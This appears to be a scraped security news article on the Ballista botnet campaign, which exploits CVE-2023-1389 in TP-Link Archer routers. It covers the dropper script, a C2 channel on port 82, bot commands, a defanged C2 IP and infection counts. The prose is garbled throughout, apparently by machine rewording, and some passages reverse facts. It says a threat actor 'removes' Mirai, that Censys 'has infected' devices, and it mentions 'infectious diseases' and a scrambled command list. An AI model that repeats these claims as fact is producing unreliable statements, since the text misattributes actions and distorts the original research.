New research from the CATO CTRL team shows that unpatched TP-Link Archer routers are the target of a new botnet campaign called Ballista.
“Botnets will automatically spread across the Internet by leveraging a remote code execution (RCE) vulnerability in TP-Link Archer Routers (CVE-2023-1389),” said security researchers in a technical report shared with Hacker News.
CVE-2023-1389 is a high-strength security flaw affecting TP-link Archer AX-21 routers that can lead to command injection, and could pave the way for remote code execution.
The earliest evidence of the aggressive exploitation of the flaw dates back to April 2023, when an unidentified threat actor uses it to remove the Mirai Botnet malware. Since then, it has been abused to propagate other malware families such as Condi and Androxgh0st.
Cato Ctrl said it detected the Ballista campaign on January 10, 2025. The most recent attempts at exploitation were recorded on February 17th.
The attack sequence involves the use of a malware dropper, a shell script (“Dropbpb.sh”) designed to retrieve and execute the main binaries of the target system for various system architectures, such as MIP, Mipsel, ARMV5L, ARMV7L, X86_64.
When executed, the malware establishes an encrypted Command and Control (C2) channel on port 82 to control the device.
“This will allow the running shell commands to carry out additional RCE and denial of service (DOS) attacks,” the researchers said. “In addition, malware attempts to read sensitive files on the local system.”
Some of the supported commands are listed below –
Flulder, which triggers flood attack exploits CVE-2023-1389 start. This is an optional parameter used with the exploiter to start a module, stopping the module trigger shell that triggers the function shell that the module executes Linux shell commands on the local system. Killall is used to terminate the service
Additionally, it can terminate previous instances of itself and erase its own existence when execution begins. It is also designed to spread to other routers by attempting to exploit the flaws.
Using C2 IP address location (2.237.57[.]70) and the presence of Italian strings in malware binaries suggests the involvement of unknown Italian threat actors, the cybersecurity company said.
That said, considering that IP addresses are no longer working and there are new variants of droppers that use TOR network domains instead of hardcoded IP addresses, it appears that malware is in active development.
A search for the Attack Surface Management Platform revealed that Censys has infected over 6,000 devices in Ballista. Infectious diseases are concentrated in Brazil, Poland, the UK, Bulgaria and Türkiye.
Botnets are known to target manufacturing, healthcare, services, and technology organizations in the United States, Australia, China and Mexico.
“The malware sample shares similarities with other botnets, but it’s different from widely used botnets like Mirai and Mozi,” the researchers said.
Source link
